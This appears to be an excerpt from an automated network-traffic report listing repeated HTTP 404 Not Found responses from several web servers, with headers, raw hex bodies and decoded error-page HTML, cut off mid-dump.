Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 29 Mar 2024 13:24:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 62 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 4b 6f e3 c6 f9 5c ff 0a 8a 41 6d 32 4b 52 94 e4 f5 ba 94 b9 8b c4 f1 16 6d 37 dd 60 1f 28 8a b5 11 8c c8 a1 34 36 c5 61 66 86 96 55 ae 80 1c 8a a2 87 a0 97 14 68 0e cd b1 e8 b5 87 1e 7a 08 fa 83 1a e7 3f f4 9b 21 25 52 22 15 af 1d 27 b0 41 72 66 be d7 7c ef 19 1d 75 3e 7a 7e fc ea f7 9f 9c 68 13 31 8d 1f ef 1c c9 97 16 a3 64 ec eb 17 d4 fe cd 0b 5d ce 61 14 3e de f9 d9 d1 14 0b a4 05 13 c4 38 16 be fe fa d5 53 fb 50 d7 ba ab 95 04 4d b1 af 5f 12 3c 4b 29 13 ba 16 d0 44 e0 04 20 67 24 14 13 3f c4 97 24 c0 b6 1a 58 1a 49 88 20 28 b6 79 80 62 ec f7 14 9d 1a 99 3d 46 47 54 f0 bd 15 91 bd 29 ba b2 c9 14 8d b1 9d 32 2c 99 78 31 62 63 bc a7 10 05 11 31 7e fc dd 5f be ba fe fa df d7 ff fc fc db 7f 7c a3 5d ff eb bf d7 5f ff 51 bb fe f3 57 da f5 df fe 74 fd f5 17 da ee 7b 87 fd 5e 6f a8 9d 27 17 04 88 32 14 08 72 89 8f ba 05 f2 ce 51 4c 92 0b 8d e1 d8 df 0b 13 2e b9 44 58 04 93 3d 6d 02 5f fe 5e b7 bb 8e e7 04 d4 b9 60 05 fb 9b 30 b9 40 82 3b b3 14 70 a6 1b 18 3a 8a 81 64 82 04 d6 35 31 4f 41 81 28 4d 63 12 20 41 68 d2 65 9c 3f b8 9a c6 b0 24 65 f4 f5 75 11 b4 5d 86 3e cb e8 50 fb ee af df 7c fb e5 df f5 82 9f 3e 11 22 e5 5e bb bc dd 08 e3 b0 ab ff 08 32 7c fb c5 97 ff fb cf e7 b7 11 05 94 31 05 d3 f2 ba 4c 3c 60 24 15 8f 77 66 24 09 e9 cc f9 74 96 e2 29 3d 27 2f b1 10 24 19 73 cd d7 72 7d 84 38 7e cd 62 dd 2b c9 9f 76 4f bb a0 5d 87 b2 f1 69 57 b9 08 3f 05 e2 0c 9f 76 15 f2 69 b7 b7 ef b8 8e 7b da 7d d4 bf 7a d4 3f ed ea 96 8e af 04 e0 3b 69 32 86 01 bf 1c df 8d 1e 20 2a 6a f0 3e 29 08 c2 97 1c d3 8c 05 58 f7 72 1d dc 17 d4 a8 d0 4a fa 8a 7c 9b 3e 4e bb b3 d4 26 49 10 67 a1 64 78 ce d5 84 42 b5 c1 4a 18 76 ed 4c 49 e2 9c f3 27 97 98 f9 07 ce be 33 d0 17 8b e1 4e f7 fd 8e f6 6a 42 b8 16 91 18 6b f0 46 99 a0 f6 18 27 40 5f e0 50 7b bf bb d3 89 b2 24 90 d6 34 88 95 98 f9 25 62 1a b5 b8 85 87 cb 79 2d 30 b0 99 0b 36 57 6b c2 cf 79 96 ca 28 7e 85 b9 e0 1e b6 04 99 c2 17 9a a6 9e 91 e0 99 f6 11 10 36 9d 4b 14 67 f8 79 64 98 8b 21 c7 9c 03 99 97 82 32 d0 97 03 09 e2 57 b0 6b 83 5a bf 7e f9 fc b7 0e 17 0c ac 47 a2 b9 21 4c 73 01 0a 09 26 92 dd 62 b1 62 9f 1a c0 43 8a 06 ca 80 ad b2 17 38 10 86 6b b9 16 8c 51 72 89 c0 1e 2a 6f ac 86 13 4c c6 13 61 c2 04 ec 3a 7e 05 f6 34 04 80 bb e6 b0 d8 80 94 f2 35 e8 78 d0 ff 80 31 34 37 b0 33 06 99 a4 31 41 76 f4 2e a4 9d 10 00 4d 8b f9 c6 0f 90 29 51 32 59 f7 25 8d 39 64 58 64 2c d1 84 83 c1 09 e6 c6 ca ae a0 3e 33 2f 17 b1 ef fb ec 8d 38 5b 98 95 82 b3 a5 82 f9 8c 48 f5 03 74 00 1e a5 47 31 1a eb 5e 89 28 c9 e8 a7 59 78 38 08 e0 19 45 83 d3 2c c2 6e 74 9a f5 5d 37 84 e7 01 7a 54 cc e8 5b c1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 29 Mar 2024 13:24:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 62 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 4b 6f e3 c6 f9 5c ff 0a 8a 41 6d 32 4b 52 94 e4 f5 ba 94 b9 8b c4 f1 16 6d 37 dd 60 1f 28 8a b5 11 8c c8 a1 34 36 c5 61 66 86 96 55 ae 80 1c 8a a2 87 a0 97 14 68 0e cd b1 e8 b5 87 1e 7a 08 fa 83 1a e7 3f f4 9b 21 25 52 22 15 af 1d 27 b0 41 72 66 be d7 7c ef 19 1d 75 3e 7a 7e fc ea f7 9f 9c 68 13 31 8d 1f ef 1c c9 97 16 a3 64 ec eb 17 d4 fe cd 0b 5d ce 61 14 3e de f9 d9 d1 14 0b a4 05 13 c4 38 16 be fe fa d5 53 fb 50 d7 ba ab 95 04 4d b1 af 5f 12 3c 4b 29 13 ba 16 d0 44 e0 04 20 67 24 14 13 3f c4 97 24 c0 b6 1a 58 1a 49 88 20 28 b6 79 80 62 ec f7 14 9d 1a 99 3d 46 47 54 f0 bd 15 91 bd 29 ba b2 c9 14 8d b1 9d 32 2c 99 78 31 62 63 bc a7 10 05 11 31 7e fc dd 5f be ba fe fa df d7 ff fc fc db 7f 7c a3 5d ff eb bf d7 5f ff 51 bb fe f3 57 da f5 df fe 74 fd f5 17 da ee 7b 87 fd 5e 6f a8 9d 27 17 04 88 32 14 08 72 89 8f ba 05 f2 ce 51 4c 92 0b 8d e1 d8 df 0b 13 2e b9 44 58 04 93 3d 6d 02 5f fe 5e b7 bb 8e e7 04 d4 b9 60 05 fb 9b 30 b9 40 82 3b b3 14 70 a6 1b 18 3a 8a 81 64 82 04 d6 35 31 4f 41 81 28 4d 63 12 20 41 68 d2 65 9c 3f b8 9a c6 b0 24 65 f4 f5 75 11 b4 5d 86 3e cb e8 50 fb ee af df 7c fb e5 df f5 82 9f 3e 11 22 e5 5e bb bc dd 08 e3 b0 ab ff 08 32 7c fb c5 97 ff fb cf e7 b7 11 05 94 31 05 d3 f2 ba 4c 3c 60 24 15 8f 77 66 24 09 e9 cc f9 74 96 e2 29 3d 27 2f b1 10 24 19 73 cd d7 72 7d 84 38 7e cd 62 dd 2b c9 9f 76 4f bb a0 5d 87 b2 f1 69 57 b9 08 3f 05 e2 0c 9f 76 15 f2 69 b7 b7 ef b8 8e 7b da 7d d4 bf 7a d4 3f ed ea 96 8e af 04 e0 3b 69 32 86 01 bf 1c df 8d 1e 20 2a 6a f0 3e 29 08 c2 97 1c d3 8c 05 58 f7 72 1d dc 17 d4 a8 d0 4a fa 8a 7c 9b 3e 4e bb b3 d4 26 49 10 67 a1 64 78 ce d5 84 42 b5 c1 4a 18 76 ed 4c 49 e2 9c f3 27 97 98 f9 07 ce be 33 d0 17 8b e1 4e f7 fd 8e f6 6a 42 b8 16 91 18 6b f0 46 99 a0 f6 18 27 40 5f e0 50 7b bf bb d3 89 b2 24 90 d6 34 88 95 98 f9 25 62 1a b5 b8 85 87 cb 79 2d 30 b0 99 0b 36 57 6b c2 cf 79 96 ca 28 7e 85 b9 e0 1e b6 04 99 c2 17 9a a6 9e 91 e0 99 f6 11 10 36 9d 4b 14 67 f8 79 64 98 8b 21 c7 9c 03 99 97 82 32 d0 97 03 09 e2 57 b0 6b 83 5a bf 7e f9 fc b7 0e 17 0c ac 47 a2 b9 21 4c 73 01 0a 09 26 92 dd 62 b1 62 9f 1a c0 43 8a 06 ca 80 ad b2 17 38 10 86 6b b9 16 8c 51 72 89 c0 1e 2a 6f ac 86 13 4c c6 13 61 c2 04 ec 3a 7e 05 f6 34 04 80 bb e6 b0 d8 80 94 f2 35 e8 78 d0 ff 80 31 34 37 b0 33 06 99 a4 31 41 76 f4 2e a4 9d 10 00 4d 8b f9 c6 0f 90 29 51 32 59 f7 25 8d 39 64 58 64 2c d1 84 83 c1 09 e6 c6 ca ae a0 3e 33 2f 17 b1 ef fb ec 8d 38 5b 98 95 82 b3 a5 82 f9 8c 48 f5 03 74 00 1e a5 47 31 1a eb 5e 89 28 c9 e8 a7 59 78 38 08 e0 19 45 83 d3 2c c2 6e 74 9a f5 5d 37 84 e7 01 7a 54 cc e8 5b c1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 29 Mar 2024 13:24:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 62 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 4b 6f e3 c6 f9 5c ff 0a 8a 41 6d 32 4b 52 94 e4 f5 ba 94 b9 8b c4 f1 16 6d 37 dd 60 1f 28 8a b5 11 8c c8 a1 34 36 c5 61 66 86 96 55 ae 80 1c 8a a2 87 a0 97 14 68 0e cd b1 e8 b5 87 1e 7a 08 fa 83 1a e7 3f f4 9b 21 25 52 22 15 af 1d 27 b0 41 72 66 be d7 7c ef 19 1d 75 3e 7a 7e fc ea f7 9f 9c 68 13 31 8d 1f ef 1c c9 97 16 a3 64 ec eb 17 d4 fe cd 0b 5d ce 61 14 3e de f9 d9 d1 14 0b a4 05 13 c4 38 16 be fe fa d5 53 fb 50 d7 ba ab 95 04 4d b1 af 5f 12 3c 4b 29 13 ba 16 d0 44 e0 04 20 67 24 14 13 3f c4 97 24 c0 b6 1a 58 1a 49 88 20 28 b6 79 80 62 ec f7 14 9d 1a 99 3d 46 47 54 f0 bd 15 91 bd 29 ba b2 c9 14 8d b1 9d 32 2c 99 78 31 62 63 bc a7 10 05 11 31 7e fc dd 5f be ba fe fa df d7 ff fc fc db 7f 7c a3 5d ff eb bf d7 5f ff 51 bb fe f3 57 da f5 df fe 74 fd f5 17 da ee 7b 87 fd 5e 6f a8 9d 27 17 04 88 32 14 08 72 89 8f ba 05 f2 ce 51 4c 92 0b 8d e1 d8 df 0b 13 2e b9 44 58 04 93 3d 6d 02 5f fe 5e b7 bb 8e e7 04 d4 b9 60 05 fb 9b 30 b9 40 82 3b b3 14 70 a6 1b 18 3a 8a 81 64 82 04 d6 35 31 4f 41 81 28 4d 63 12 20 41 68 d2 65 9c 3f b8 9a c6 b0 24 65 f4 f5 75 11 b4 5d 86 3e cb e8 50 fb ee af df 7c fb e5 df f5 82 9f 3e 11 22 e5 5e bb bc dd 08 e3 b0 ab ff 08 32 7c fb c5 97 ff fb cf e7 b7 11 05 94 31 05 d3 f2 ba 4c 3c 60 24 15 8f 77 66 24 09 e9 cc f9 74 96 e2 29 3d 27 2f b1 10 24 19 73 cd d7 72 7d 84 38 7e cd 62 dd 2b c9 9f 76 4f bb a0 5d 87 b2 f1 69 57 b9 08 3f 05 e2 0c 9f 76 15 f2 69 b7 b7 ef b8 8e 7b da 7d d4 bf 7a d4 3f ed ea 96 8e af 04 e0 3b 69 32 86 01 bf 1c df 8d 1e 20 2a 6a f0 3e 29 08 c2 97 1c d3 8c 05 58 f7 72 1d dc 17 d4 a8 d0 4a fa 8a 7c 9b 3e 4e bb b3 d4 26 49 10 67 a1 64 78 ce d5 84 42 b5 c1 4a 18 76 ed 4c 49 e2 9c f3 27 97 98 f9 07 ce be 33 d0 17 8b e1 4e f7 fd 8e f6 6a 42 b8 16 91 18 6b f0 46 99 a0 f6 18 27 40 5f e0 50 7b bf bb d3 89 b2 24 90 d6 34 88 95 98 f9 25 62 1a b5 b8 85 87 cb 79 2d 30 b0 99 0b 36 57 6b c2 cf 79 96 ca 28 7e 85 b9 e0 1e b6 04 99 c2 17 9a a6 9e 91 e0 99 f6 11 10 36 9d 4b 14 67 f8 79 64 98 8b 21 c7 9c 03 99 97 82 32 d0 97 03 09 e2 57 b0 6b 83 5a bf 7e f9 fc b7 0e 17 0c ac 47 a2 b9 21 4c 73 01 0a 09 26 92 dd 62 b1 62 9f 1a c0 43 8a 06 ca 80 ad b2 17 38 10 86 6b b9 16 8c 51 72 89 c0 1e 2a 6f ac 86 13 4c c6 13 61 c2 04 ec 3a 7e 05 f6 34 04 80 bb e6 b0 d8 80 94 f2 35 e8 78 d0 ff 80 31 34 37 b0 33 06 99 a4 31 41 76 f4 2e a4 9d 10 00 4d 8b f9 c6 0f 90 29 51 32 59 f7 25 8d 39 64 58 64 2c d1 84 83 c1 09 e6 c6 ca ae a0 3e 33 2f 17 b1 ef fb ec 8d 38 5b 98 95 82 b3 a5 82 f9 8c 48 f5 03 74 00 1e a5 47 31 1a eb 5e 89 28 c9 e8 a7 59 78 38 08 e0 19 45 83 d3 2c c2 6e 74 9a f5 5d 37 84 e7 01 7a 54 cc e8 5b c1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Mar 2024 13:24:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Mar 2024 13:24:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Mar 2024 13:24:36 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Mar 2024 13:24:39 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 29 Mar 2024 13:24:45 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 29 Mar 2024 13:24:47 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 